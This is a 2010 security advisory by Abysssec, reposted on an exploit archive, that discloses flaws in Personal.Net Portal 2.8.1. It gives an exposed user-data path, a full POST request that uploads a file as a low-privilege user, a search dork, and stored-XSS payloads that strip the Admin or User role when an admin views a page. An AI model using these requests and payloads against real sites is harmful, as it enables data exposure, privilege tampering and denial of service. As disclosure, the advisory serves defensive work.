首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Personal.Net Portal Multiple Vulnerabilities
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-23  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

'''


Abysssec Inc Public Advisory
 
 
  Title            :  Personal.Net Portal Multiple Vulnerabilities
  Affected Version :  Personal.Net Portal Version 2.8.1
  Discovery        :  www.Abysssec.com
  Vendor    :  http://www.dotnet-portal.net/Home.tab.aspx
  Download Links   :  http://sourceforge.net/projects/dotnetportal/
  Dork     :  "Personal .NET Portal"         
 
 
Description :
===========================================================================================     
  This version of Personal.Net Portal(2.8.1) have Multiple Valnerabilities :
        1- User's Information Revelation
        2- Upload a file with normal user that have low privilage
 3- Persistent XSS for DDOS and remove Roles and ... (XSRF)


User's Information Revelation:
===========================================================================================    

  With this path you can find User's Information of site:

 http://Example.com/Data/Statistics/Logins.xml
 
  this Information includes:     
        UserId
        LoginCount
        LastLogin
        LoginName  ( for Example Admin )
        FirstName
        LastName

 

Upload a file with normal user that have low privilage:
===========================================================================================    
   After you logged in as a normal user (for example userName:user and Password:user),
   in the following path you can upload a specific file
   with POST Method which is containing user's cookie.

   http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/
  
   For example this POST request:

 POST http://Example.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1
 Host: Example.com
 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-us,en;q=0.5
 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
 Keep-Alive: 300
 Proxy-Connection: keep-alive 
 Referer: http://Example.com/FCKeditor/editor/filemanager/browser/default/frmupload.html
 Cookie: ASP.NET_SessionId=wonb3e55eqgbrpnqdhcqly55; dotnetportal.auth=CE8C1A54B9676CDB4F911C820B4F59C50C75F6684E839578C59D289707A340E9EA444119E44E2B155612375255900C6FD3E0C94463E4C0ECEB929872CF2505FC
 Content-Type: multipart/form-data; boundary=---------------------------125671705429877
 Content-Length: 500  


 -----------------------------125671705429877
 Content-Disposition: form-data; name="NewFile"; filename="shell.zip"
 Content-Type: application/octet-stream

 ... any thing
 -----------------------------125671705429877--
  

   Here we have limitation of uploading specific file extension implementing by FckEditor v2
   that bypassing this barrier is on you.

   Uploaded files will be placing in this path:

        http://Example.com/Data/Resources/file/
       
  
   Vulnerable Code:
        The misconfiguration is in ...\FCKeditor\editor\filemanager\connectors\aspx\config.ascx 
        ln 42:
              private bool CheckAuthentication()
       { 
           return Page.User.Identity.IsAuthenticated;
       }


Persistent XSS and XSRF:
===========================================================================================    

  In these Modules you can find Persistent XSS that data saves with no sanitization:

  1- Module name: CSVTable
     Field      : text

     Vulnerable Code:
     ...\Modules\CSVTable\editcsvtable.ascx
     ln 39:   sw.Write(txt.Text);

     For Example you can enter this script for DDOS:
       <script>__doPostBack('ctl071$Linkbutton21','')</script>
     --------------------------------------------------------------------------------------- 

  2- Module name: Feedback
     Fields     : From , Title , Message

     Vulnerable Code:
     ...\Modules\Feedback\feedback.ascx
     ln 55,56,57:   r["From"] = txtFrom.Text;
             r["Title"] = txtTitle.Text;
             r["Message"] = txtMessage.Text;
     --------------------------------------------------------------------------------------- 

  3- Module name: Html
     Field      : text

     Vulnerable Code:
     ...\Modules\Html\edithtml.ascx
     ln 39:   w.Write(txt.Text);
     --------------------------------------------------------------------------------------- 

  4- Module name: MyUser
     Fields     : First name , Sur name

     Vulnerable Code:
     ...\Modules\MyUser\MyUser.ascx.cs
     ln 55:    UserManagement.SaveUser(
               Page.User.Identity.Name,
               pwd, txtFirstName.Text, txtSurName.Text, txtEMail.Text,
               new System.Collections.ArrayList(principal.Roles), principal.Id);


     For Example you can enter this script for remove Admin Role:
        <script>__doPostBack('Content$ctl14$gridRoles$ctl02$ctl00','')</script> 

     or this for remove User Role:
        <script>__doPostBack('Content$ctl14$gridRoles$ctl03$ctl00','')</script>
  
     and when Admin see this page:
        http://Example.com/default.aspx?TabRef=adminusers

     the Role will be removed and program will be DDOS.

     --------------------------------------------------------------------------------------- 

   5- Module name: News
      Field      : text

     Vulnerable Code:
     ...\Modules\News\editnews.ascx
     ln 70:    dr["Text"] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[4].Controls[1]).Text;
     --------------------------------------------------------------------------------------- 

   6- Module name: Quotations
      Field      : text

     Vulnerable Code:
     ...\Modules\Quotations\editquotations.ascx
     ln 39:    sw.Write(txt.Text);   
     --------------------------------------------------------------------------------------- 

   7- Module name: Table
      Field      : column

     Vulnerable Code:
     ...\Modules\Table\edittable.ascx
     ln 65:     dr[i] = ((System.Web.UI.WebControls.TextBox)repAddRow.Items[i].FindControl("data")).Text;
     ln 137:    dr[i] = ((System.Web.UI.WebControls.TextBox)e.Item.Cells[i + 2].Controls[0]).Text;
     --------------------------------------------------------------------------------------- 


===========================================================================================
 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Acoustica Audio Converter Pro
·万博网站管理系统(NWEB)通杀漏洞
·Softek Barcode Reader Toolkit
·BifrsoT DLL Hijacking Exploit
·Novell iPrint Client ActiveX C
·RarCrack v0.2 "filename" init(
·Novell iPrint Client ActiveX C
·Microsoft DRM Technology (msne
·Ubuntu Linux 'mountall' Local
·Java CMM readMabCurveData Stac
·gausCMS Multiple Vulnerabiliti
·VWD-CMS CSRF Vulnerability
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved